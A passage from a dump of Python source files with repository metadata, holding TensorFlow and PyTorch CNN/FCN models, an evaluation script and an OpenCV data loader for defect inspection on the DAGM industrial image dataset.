kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64) \r\n l1 = tf.layers.batch_normalization(l1, training=self.training)\r\n l1 = tf.nn.relu(l1) \r\n l1 = tf.layers.conv2d(inputs=l1, filters=64, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64) \r\n l1 = tf.layers.batch_normalization(l1, training=self.training)\r\n l1 = tf.nn.relu(l1)\r\n \r\n out = tf.layers.max_pooling2d(inputs=l1, pool_size=[2,2], padding=\"SAME\", strides=2) # (?,8,8,64)16 \r\n# dropout1 = tf.layers.dropout(inputs=pool1, rate=0.7, training=self.training)\r\n \r\n\r\n # Convolutional Layer #2 and Pooling Layer #3\r\n out = tf.layers.conv2d(inputs=out, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.max_pooling2d(inputs=out, pool_size=[2,2], padding=\"SAME\", strides=2) # (4,4) \r\n# dropout2 = tf.layers.dropout(inputs=pool2, rate=0.7, training=self.training)\r\n \r\n \r\n \r\n # Convolutional Layer #2 and Pooling Layer #3\r\n out = tf.layers.conv2d(inputs=out, filters=512, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=512, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=512, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=512, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.max_pooling2d(inputs=out, pool_size=[2,2], padding=\"SAME\", strides=2) # (2,2) \r\n# dropout3 = tf.layers.dropout(inputs=pool3, rate=0.7, training=self.training)\r\n \r\n # Dense Layer with Relu ========================================================================\r\n out = tf.reshape(out, [-1, 512*4*4]) # 32-(?,4*4*128) # 60-(?,8*8*128) \r\n \r\n out = tf.layers.dense(inputs=out, units=1024, activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,1024)\r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out) \r\n \r\n self.logits = tf.layers.dense(inputs=out, units=self._lable_size, activation=None, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer,\r\n bias_regularizer=self.kernel_regularizer) # (?,13)\r\n \r\n \r\n self.prob = tf.nn.softmax(self.logits, name=\"prob\")\r\n# self.prob_argmax = tf.argmax(self.prob, 1, name=\"prob_argmax\")\r\n self.result = tf.argmax(self.logits, 1, name=\"result\")\r\n# self.probability = tf.max(self.prob, axis=1, name='probability')\r\n \r\n # define cost/loss & optimizer\r\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=self.logits, labels=self.Y))\r\n optimizer = tf.train.AdamOptimizer(learning_rate=self._learning_rate)\r\n self.train_op = ''\r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n self.train_op = optimizer.minimize(self.cost, global_step=tf.train.get_global_step())\r\n\r\n correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.Y, 1))\r\n \r\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n def predict(self, x_test, training=False):\r\n return self.sess.run(self.prob,\r\n feed_dict={self.X: x_test, self.training: training})\r\n\r\n def get_accuracy(self, x_test, y_test, training=False):\r\n return self.sess.run(self.accuracy,\r\n feed_dict={self.X: x_test,\r\n self.Y: y_test, self.training: training})\r\n\r\n def train(self, x_data, y_data, training=True):\r\n return self.sess.run([self.cost, self.train_op], feed_dict={\r\n self.X: x_data, self.Y: y_data, self.training: training})\r\n"
},
{
"alpha_fraction": 0.5658413767814636,
"alphanum_fraction": 0.5782999396324158,
"avg_line_length": 28.962085723876953,
"blob_id": "a77c2016d4262b5f955a03ffb123439b1dd20dd7",
"content_id": "ab773426ea714cf431d02e61525b6b339b6997d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6341,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 211,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_fcn_evaluation.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport time\nimport glob\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport torch\n#import torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\n#from torch.utils.data import TensorDataset\n#from torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\n#import cv2\n\nsys.path.append(\"../../ML_utils\")\nimport JK_image\n\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\nsys.path.append(\"networks\") # parent directory\n\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if isGPU:\n array_torch = Variable(array_torch).cuda()\n else :\n array_torch = Variable(array_torch).cpu()\n return array_torch\n\ndef detectDefect( args, isResultSave=True):\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n modelPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + '_all.pkl'\n convParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'convParams.pkl'\n deconvParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'deconvParams.pkl'\n \n \n convNet = \"\"\n deconvNet = \"\" \n \n try:\n print(\"Model path :\", modelPath)\n convNet, deconvNet = torch.load(modelPath, map_location=lambda storage, location: storage)\n print(\"\\n--------\" + modelPath + \" is restored--------\\n\")\n \n# print(\"Conv parameters path :\", convParamsPath)\n# print(\"Deconv parameters path :\", deconvParamsPath)\n# convNet.load_state_dict(torch.load(convParamsPath)) # it loads only the model parameters (recommended) \n# deconvNet.load_state_dict(torch.load(deconvParamsPath)) # it loads only the model parameters (recommended)\n# print(\"\\n--------\" + convParamsPath + \" is restored--------\\n\")\n# print(\"\\n--------\" + deconvParamsPath + \" is restored--------\\n\")\n \n \n if args.isGPU:\n convNet.cuda()\n deconvNet.cuda() \n else :\n convNet.cpu()\n deconvNet.cpu() \n \n except:\n print(\"\\n--------There are no models.--------\\n\")\n pass\n \n \n convNet.eval()\n deconvNet.eval()\n \n# images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n X_np = np.array(images, dtype=np.float32)/255.\n X_np = X_np.reshape([-1,1,height,width]) \n\n X = numpyToTorchVariable(X_np, args.isGPU)\n\n output = convNet(X)\n output = deconvNet(output) \n\n if args.isGPU:\n output = output.cpu()\n \n output = output.data.numpy()\n outImages_np = output.reshape([-1, width, height])\n \n for i in range(nImages): \n \n outputImg = outImages_np[i]\n \n # a colormap and a normalization instance\n cmap = plt.cm.jet\n norm = plt.Normalize(vmin=outputImg.min(), vmax=outputImg.max()) \n # map the normalized data to colors\n resultImg = cmap(norm(outputImg))\n \n if isResultSave: \n filePath = resultFolderPath + 'output%d.png' % i\n plt.imsave(filePath, outputImg, cmap='gray')\n \n filePath = resultFolderPath + 'heatmap%d.png' % i\n plt.imsave(filePath, resultImg) \n \n plt.subplot(1,3,1) \n plt.imshow(images[i], cmap='gray') \n plt.subplot(1,3,2)\n plt.imshow(outputImg, cmap='gray')\n plt.subplot(1,3,3)\n plt.imshow(resultImg)\n plt.show() \n \n print(\"Input size :\", X_np[i].shape)\n print(\"Output size :\", output[i].shape)\n print(\"========================================================\")\n \n print(\"Input size :\", X_np.shape)\n print(\"Output size :\", output.shape)\n print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 'load_folder_file': (\"DAGM_jkfcn3/\",'jkfcn3'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"./DataForEval\",\n })\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n \n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n \n detectDefect(args, isResultSave=True ) \n \n "
},
{
"alpha_fraction": 0.5107482075691223,
"alphanum_fraction": 0.5266618132591248,
"avg_line_length": 39.35157775878906,
"blob_id": "df636accc9db14ca7e879be4e2210c6a382c9f6b",
"content_id": "f1a2fe766fef023d8ca4acdda3d61b6d6d7e5c2e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19198,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 475,
"path": "/DAGM/DAGM_CNN_final/dagmCV2.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys, os\nsys.path.append(os.pardir) # parent directory\n#import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.gridspec as gridspec\nfrom sklearn.feature_extraction import image\n# from PIL import Image\nimport cv2\nimport glob\nimport random\nimport struct\n\n\n# PIL_JK class includes PIL util made by JK\n\nclass Data(object):\n def __init__(self):\n self.images = np.zeros(1)\n self.labels = np.zeros(1)\n self.start_batch = 0\n self.end_batch = 0\n self.num_examples = 0\n \n def next_batch(self, batch_size):\n mini_batch = np.random.choice(len(self.images), batch_size, replace=False)\n \n# self.end_batch = self.start_batch+batch_size\n# mini_batch = np.arange(self.start_batch, self.end_batch)\n# if self.end_batch!=len(self.images):\n# self.start_batch = self.end_batch\n# else :\n# self.start_batch = 0\n \n return self.images[mini_batch], self.labels[mini_batch]\n \n\ndef genImgListWithFilename(folderpath, imgType, start, end): # input : path # output : imgList # path안의 이미지들을 리스트로 만들어준다.\n imgList = [] \n for i in range(start, end+1):\n filepath = folderpath+ '/' + str(i) + '.' + imgType \n image = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n# cv2.imshow('ddd',image)\n# cv2.waitKey(0)\n imgList.append(image) \n return imgList \n\n\ndef cvRotateImg(img, angle): \n rows = img.shape[0]\n cols = img.shape[1]\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n image = cv2.warpAffine(img,M,(cols,rows))\n return image\n \n\n# data augmentation \ndef dataAugmentation(image):\n Xli = []\n \n verticalFlip = cv2.flip(image,1) # vertical flip \n for i in range(1, 5): \n augmentedImg1 = cvRotateImg(image, 90*i)\n augmentedImg2 = cvRotateImg(verticalFlip, 90*i)\n Xli.append(augmentedImg1) \n Xli.append(augmentedImg2) \n \n return Xli\n\nclass DAGM(object):\n \"\"\"\n \n \"\"\"\n def __init__(self, dataPath, label_format=2):\n \n self.dataPath = dataPath\n \n self.label_size = 12\n \n self.label_folder = 'Label/'\n if label_format==3:\n self.label_folder = 'Label_new/'\n \n \n self.trainInfoC1_OK, self.trainInfoC1_NG = self.getDataInformation(1, True)\n self.testInfoC1_OK, self.testInfoC1_NG = self.getDataInformation(1, False) \n self.trainInfoC2_OK, self.trainInfoC2_NG = self.getDataInformation(2, True)\n self.testInfoC2_OK, self.testInfoC2_NG = self.getDataInformation(2, False) \n self.trainInfoC3_OK, self.trainInfoC3_NG = self.getDataInformation(3, True)\n self.testInfoC3_OK, self.testInfoC3_NG = self.getDataInformation(3, False) \n self.trainInfoC4_OK, self.trainInfoC4_NG = self.getDataInformation(4, True)\n self.testInfoC4_OK, self.testInfoC4_NG = self.getDataInformation(4, False) \n self.trainInfoC5_OK, self.trainInfoC5_NG = self.getDataInformation(5, True)\n self.testInfoC5_OK, self.testInfoC5_NG = self.getDataInformation(5, False) \n self.trainInfoC6_OK, self.trainInfoC6_NG = self.getDataInformation(6, True)\n self.testInfoC6_OK, self.testInfoC6_NG = self.getDataInformation(6, False) \n\n #readFreeImg()\n self.train = Data()\n self.test = Data() \n \n \n def getDataInformation(self, classNo, isTrain):\n \n labelFolder = '/Test/Label/'\n if isTrain: \n labelFolder = '/Train/' + self.label_folder\n \n classPath = self.dataPath + '/Class' + str(classNo)\n labelsPath = classPath + labelFolder\n \n imgInfoFile = open(labelsPath+'Labels.txt', 'r') \n imgInfoBuffer = imgInfoFile.readline().split()\n OK_info = []\n NG_info = []\n for i in range(0, 575):\n imgInfoBuffer = imgInfoFile.readline().split()\n# print([classNo]+imgInfoBuffer)\n if imgInfoBuffer[1]=='0':\n OK_info.append([classNo]+imgInfoBuffer)\n elif imgInfoBuffer[1]=='1':\n NG_info.append([classNo]+imgInfoBuffer)\n\n return OK_info, NG_info\n \n \n \n def getBlockImages(self, blockH, blockW, nOKperClass=160, nNGperClass=160, classNoList=[1,2,3,4,5,6], label_type='image', isTrain=True):\n \n dataX = []\n dataY = []\n \n self.label_type = label_type # image, index, or array\n \n for classNo in classNoList:\n X=[]\n Y=[]\n if classNo==1:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC1_OK, self.trainInfoC1_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC1_OK, self.testInfoC1_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==2:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC2_OK, self.trainInfoC2_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC2_OK, self.testInfoC2_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==3:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC3_OK, self.trainInfoC3_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC3_OK, self.testInfoC3_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==4:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC4_OK, self.trainInfoC4_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC4_OK, self.testInfoC4_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==5:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC5_OK, self.trainInfoC5_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC5_OK, self.testInfoC5_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==6:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC6_OK, self.trainInfoC6_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC6_OK, self.testInfoC6_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n dataX += X\n dataY += Y\n \n dataX = np.array(dataX, dtype=np.float32)\n if self.label_type=='image' or self.label_type=='array':\n dataY = np.array(dataY, dtype=np.float32)\n elif self.label_type=='index':\n dataY = np.array(dataY, dtype=np.int32)\n \n if isTrain:\n self.train.images = dataX\n self.train.labels = dataY\n self.train.num_examples = self.train.images.shape[0]\n print(\"Train images shape :\", self.train.images.shape)\n print(\"Train labels shape :\", self.train.labels.shape)\n else :\n self.test.images = dataX\n self.test.labels = dataY\n self.test.num_examples = self.test.images.shape[0]\n print(\"Test images shape :\", self.test.images.shape)\n print(\"Test labels shape :\", self.test.labels.shape)\n \n \n \n def extractBlocks(self, classNo, dataInfo_OK, dataInfo_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain=True ):\n \n X = []\n Y = []\n \n dataFolder = '/Test/'\n labelFolder = '/Test/Label/'\n if isTrain: \n dataFolder = '/Train/'\n labelFolder = '/Train/' + self.label_folder\n \n classPath = self.dataPath + '/Class' + str(classNo)\n xDataPath = classPath + dataFolder\n yDataPath = classPath + labelFolder\n \n #====== OK\n random_batch = np.random.choice(len(dataInfo_OK), nOKperClass, replace=False)\n nBlockPerImage = 5\n tempY = np.zeros([blockW, blockH])\n for i in random_batch:\n imgInfoBuffer = dataInfo_OK[i]\n# print(imgInfoBuffer)\n Xpath = xDataPath + imgInfoBuffer[3]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n try :\n tempX = image.extract_patches_2d(tempX, (blockW, blockH), max_patches=nBlockPerImage) \n except:\n print(imgInfoBuffer)\n continue \n \n for j in range(nBlockPerImage):\n X.append(tempX[j]/255.)\n \n if self.label_type=='image':\n Y.append(tempY/255.)\n \n elif self.label_type=='index': \n \n if self.label_size==12:\n Y.append(classNo-1)\n elif self.label_size==13:\n Y.append(classNo)\n \n elif self.label_type=='array':\n temp = np.zeros(self.label_size)\n if self.label_size==12:\n temp[classNo-1] = 1\n elif self.label_size==13:\n temp[classNo] = 1\n Y.append(temp)\n \n #====== NG \n if nNGperClass<8:\n nNGperClass=8 \n numNGperClass = int(nNGperClass/8)\n random_batch = np.random.choice(len(dataInfo_NG), numNGperClass, replace=False)\n \n for i in random_batch:\n imgInfoBuffer = dataInfo_NG[i]\n Xpath = xDataPath + imgInfoBuffer[3]\n Ypath = yDataPath + imgInfoBuffer[5]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempY = cv2.imread(Ypath, cv2.IMREAD_GRAYSCALE) # B, G, R \n \n try:\n tempX.shape \n tempY.shape\n except:\n print(imgInfoBuffer)\n continue\n \n w = tempX.shape[1]\n h = tempX.shape[0]\n defectPixels = []\n for y in range(h):\n for x in range(w):\n if tempY[y,x]>0:\n# print(y,x)\n defectPixels.append((y,x))\n \n choicePixels = np.random.choice(len(defectPixels), nBlockPerImage, replace=False) \n \n for j in choicePixels:\n y = int( defectPixels[j][0]-blockH/2 )\n x = int( defectPixels[j][1]-blockW/2 )\n if x<0:\n x=0\n elif x>=w-blockW:\n x=w-blockW-1\n if y<0:\n y=0\n elif y>=h-blockH:\n y=h-blockH-1\n# print(tempX[y,x])\n cropX = tempX[y:y+blockH, x:x+blockW]\n cropY = tempY[y:y+blockH, x:x+blockW]\n# print(cropX.shape)\n# plt.imshow(cropX, cmap='gray')\n# plt.show()\n# plt.imshow(cropY, cmap='gray')\n# plt.show()\n X += dataAugmentation(cropX/255.)\n if self.label_type=='image':\n Y += dataAugmentation(cropY/255.)\n \n elif self.label_type=='index':\n indexNo = None\n if self.label_size==12:\n indexNo = classNo+5\n elif self.label_size==13:\n indexNo = classNo+6\n \n for k in range(8):\n Y.append(indexNo) \n \n elif self.label_type=='array':\n temp = np.zeros(self.label_size)\n \n if self.label_size==12:\n temp[classNo+5] = 1\n elif self.label_size==13:\n temp[classNo+6] = 1\n \n for k in range(8):\n Y.append(temp)\n \n return X, Y\n \n \n \n ################################################======================================================================\n \n def getFullImages(self, sizeW, sizeH, nOKperClass=50, nNGperClass=50, classNoList=[1,2,3,4,5,6], isTrain=True):\n \n dataX = []\n dataY = []\n \n for classNo in classNoList:\n X = []\n Y = []\n if classNo==1:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC1_OK, self.trainInfoC1_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC1_OK, self.testInfoC1_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==2:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC2_OK, self.trainInfoC2_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC2_OK, self.testInfoC2_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==3:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC3_OK, self.trainInfoC3_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC3_OK, self.testInfoC3_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==4:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC4_OK, self.trainInfoC4_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC4_OK, self.testInfoC4_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==5:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC5_OK, self.trainInfoC5_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC5_OK, self.testInfoC5_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n elif classNo==6:\n if isTrain :\n X, Y = self.getRequestedClassFullImages(classNo, self.trainInfoC6_OK, self.trainInfoC6_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.getRequestedClassFullImages(classNo, self.testInfoC6_OK, self.testInfoC6_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain)\n \n dataX += X\n dataY += Y\n\n dataX = np.array(dataX, dtype=np.float32)\n dataY = np.array(dataY, dtype=np.float32)\n \n if isTrain:\n self.train.images = dataX\n self.train.labels = dataY\n self.train.num_examples = self.train.images.shape[0]\n print(\"Train images shape :\", self.train.images.shape)\n print(\"Train labels shape :\", self.train.labels.shape)\n else :\n self.test.images = dataX\n self.test.labels = dataY\n self.test.num_examples = self.test.images.shape[0]\n print(\"Test images shape :\", self.test.images.shape)\n print(\"Test labels shape :\", self.test.labels.shape)\n \n\n \n \n def getRequestedClassFullImages(self, classNo, dataInfo_OK, dataInfo_NG, sizeW, sizeH, nOKperClass, nNGperClass, isTrain ):\n\n X = []\n Y = []\n \n dataFolder = '/Test/'\n labelFolder = '/Test/Label/'\n if isTrain: \n dataFolder = '/Train/'\n labelFolder = '/Train/' + self.label_folder\n \n classPath = self.dataPath + '/Class' + str(classNo)\n xDataPath = classPath + dataFolder\n yDataPath = classPath + labelFolder\n \n random_batch = np.random.choice(len(dataInfo_OK), nOKperClass, replace=False)\n \n for i in random_batch:\n imgInfoBuffer = dataInfo_OK[i]\n Xpath = xDataPath + imgInfoBuffer[3]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempX = cv2.resize(tempX, (sizeW, sizeH)) \n# print(imgInfoBuffer)\n# cv2.imshow('ddd', image)\n# cv2.waitKey(0)\n tempY = np.zeros([sizeW, sizeH])\n X.append(tempX/255.)\n Y.append(tempY/255.)\n \n if nNGperClass<8:\n nNGperClass=8 \n numNGperClass = int(nNGperClass/8)\n random_batch = np.random.choice(len(dataInfo_NG), numNGperClass, replace=False)\n \n for i in random_batch:\n imgInfoBuffer = dataInfo_NG[i]\n Xpath = xDataPath + imgInfoBuffer[3]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempX = cv2.resize(tempX, (sizeW, sizeH)) \n# print(imgInfoBuffer)\n# cv2.imshow('ddd', image)\n# cv2.waitKey(0)\n \n Ypath = yDataPath + imgInfoBuffer[5]\n tempY = cv2.imread(Ypath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempY = cv2.resize(tempY, (sizeW, sizeH))\n# cv2.imshow('ddd', labeledImage)\n# cv2.waitKey(0)\n X += dataAugmentation(tempX/255.)\n Y += dataAugmentation(tempY/255.)\n \n return X, Y\n\n\n\n\n \n \nif __name__ == '__main__': \n \n\n dataPath = \"../DAGM_dataset\" \n\n \n dagm = DAGM(dataPath) \n dagm.getBlockImages(blockW=256, blockH=256, nOKperClass=1, nNGperClass=1, isTrain=False)\n# dagm.getFullImages( sizeW=300, sizeH=300, nOKperClass=1, nNGperClass=1, isTrain=False)\n# print(dagm.test.images[700])\n \n temp = dagm.test.images[0]\n plt.imshow(temp, cmap='gray')\n plt.show() \n temp = dagm.test.labels[0]\n plt.imshow(temp, cmap='gray')\n plt.show() \n\n# cv2.imshow('ddd', dagm.train.images[0])\n# cv2.waitKey(0)"
},
{
"alpha_fraction": 0.5037208199501038,
"alphanum_fraction": 0.5393892526626587,
"avg_line_length": 29.20930290222168,
"blob_id": "e83e8bd00ba1c91c4f05f7deb135f7e202fe2bf3",
"content_id": "9d97a86aaecfd5f534a707e8cff743d666e43e98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3897,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 129,
"path": "/DAGM/DAGM_CNN_pytorch/networks/cnn1.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\n\n\nimport sys, os\nsys.path.append(os.pardir) # parent directory\n#import numpy as np\n#import time\n\nimport torch.nn as nn\nimport math\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\n\n\nclass OneConvBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1):\n super(OneConvBlock, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True) \n self.stride = stride\n \n def forward(self, x):\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n return out\n\nclass ConvNetJK(nn.Module):\n\n def __init__(self, block, layers, k=1, input_size=(1,32,32), 